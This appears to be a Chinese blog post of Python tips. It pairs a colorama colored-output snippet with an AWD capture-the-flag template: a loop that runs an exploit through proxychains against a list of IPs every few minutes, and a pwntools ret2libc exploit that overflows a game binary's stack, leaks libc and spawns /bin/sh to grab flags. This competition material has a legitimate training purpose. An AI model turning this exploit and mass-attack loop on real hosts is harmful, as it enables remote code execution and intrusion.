python使用技巧

1 使用colorama库带颜色输出日志

#!/usr/bin/env python 
#encoding: utf-8

from colorama import init, Fore, Back, Style


if __name__ == "__main__":

    init(autoreset=True)    #  初始化，并且设置颜色设置自动恢复
    print(Fore.RED + 'some red text')
    print(Back.GREEN + 'and with a green background')
    print(Style.DIM + 'and in dim text')
    # 如果未设置autoreset=True，需要使用如下代码重置终端颜色为初始设置
    #print(Fore.RESET + Back.RESET + Style.RESET_ALL)  autoreset=True
    print('back to normal now')

2 pwn awd模板

awd模式千万不要使得单个脚本功能太过庞大，脚本很容易出现问题，而且调试起来很麻烦，建议将flag提交脚本和exp实现脚本分开，下面提供简单模板：

flag提交

#coding:utf-8
import re
import os
import requests
from colorama import init, Fore, Back, Style
import time


init(autoreset=True)

isSubmit = False

def searchflag(str1):
    pattern = "(\w+-)+\w+"
    m = re.search(pattern,str1)
    return m


def exp(ip,token):
    cmd = "proxychains python {src} {ip} {token}".format(src = "exp.py",ip = ip,token = token)
    os.system(cmd)

'''
def get_token():
    with open("token.txt") as f:
        a=f.read()
    return a
'''

def login(username,password):
    pass

def  submit(flag):
    pass


def do(ip):
    token = get_token()
    try:
        exp(ip,token)
        print(Fore.GREEN+"[+]  success link! :ip-> {ip} ,token-> {token}".format(ip = ip,token =token))
        if isSubmit:
            with open("flag","r") as f:
                flag = f.read().strip()
            submit(flag)
    except Exception as e:
        print(Back.RED+"error:" + ip +"\n" +repr(e))
        #raise e


iplist = []
import time

if __name__ =="__main__":
    while True:
        for ip in iplist:
            do(ip)
        t = time.strftime("%H:%M:%S",time.localtime())
        print(Back.YELLOW + "nowtime : {t}".format(t= t))
        hour = t.split(":")[0]
        if int(hour) >= 9:
            break
        time.sleep(8*60)

exp书写格式：

#coding:utf-8

from pwn import *
import sys
import re
from colorama import init, Fore, Back, Style


init(autoreset=True)

debug = False

def searchflag(str1):
    pattern = "(\w+-)+\w+"
    m = re.search(pattern,str1)
    return m

if debug:
    context(arch="x86_64",os = "linux",log_level="debug")
    p = process("./3pwn")
else:
    ip = sys.argv[1]
    token = sys.argv[2]
    context(arch="x86_64",os = "linux",timeout = 20)
    p = remote(ip, 9999)

#pwnlib.gdb.attach(proc.pidof(p)[0])

elf = ELF("./king-of-glory")

libc = ELF("libc.so")

def buy_medicine():
    p.sendline("4")
    p.sendline("1")
    p.recvuntil("want: ")
    p.sendline("9"*16)
    p.sendline("4")
    p.sendline("1")
    p.recvuntil("want: ")
    p.sendline("9"*16)
    p.sendline("4")
    p.sendline("1")
    p.recvuntil("want: ")
    p.sendline("9"*16)
    p.sendline("4")
    p.sendline("1")
    p.recvuntil("want: ")
    p.sendline("9"*16)
    p.sendline("3")
    p.recv()

buy_medicine()

def UnlimiedMoneyWorks(idx):
    p.sendline("9")
    p.recvuntil("name?\n")
    p.sendline("a"*69)
    #p.sendline(name)
    p.recv()
    p.sendline(idx)

vul_addr = 0x400B88

pop_rdi_ret = 0x0000000000401403 
payload = "a"*0xB0 + p64(0xdeadbeef) 
payload+=p64(pop_rdi_ret)+p64(elf.got["puts"]) +p64(elf.sym["puts"])+p64(vul_addr)
UnlimiedMoneyWorks(payload)

def get_addr():
    return u64(p.recvuntil("\x7f")[-6:].ljust(8,"\0"))

libc_puts = get_addr()
libc_base = libc_puts - libc.sym["puts"]
#success("libc_puts -> {:#x}".format(libc_puts))
#success("libc_base -> {:#x}".format(libc_base))

libc_system = libc_base + libc.sym["system"]
libc_binsh = libc_base + libc.search("/bin/sh").next()
#success("libc_system -> {:#x}".format(libc_system))
#success("libc_binsh -> {:#x}".format(libc_binsh))

payload = "a"*0xB0 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(libc_binsh)+p64(libc_system)
p.sendline(payload)
p.recv()
#p.sendline("cat flag.txt")
p.sendline("\ngetflag")
flag = p.recv()
m = searchflag(flag)
if m:
    flag = m.group()
    success(Back.GREEN +"ip -> {ip},token -> {token},flag -> {flag} ".format(ip =ip,token = token,flag = flag))

    #cmd = "echo {0} >>token".format(token)
    cmd = "hereiam -t {token}".format(token = token)
    p.sendline(cmd)
    p.sendline("exit")
#p.send("\n\n")
    p.close()
    with open("flag","w") as f:
        f.write(flag)
else:
    print(Back.RED+"[-] failed!!! can't get flag from {0}".format(ip))
    p.close()

python使用技巧

1 使用colorama库带颜色输出日志

2 pwn awd模板

你可能感兴趣的:(python使用技巧)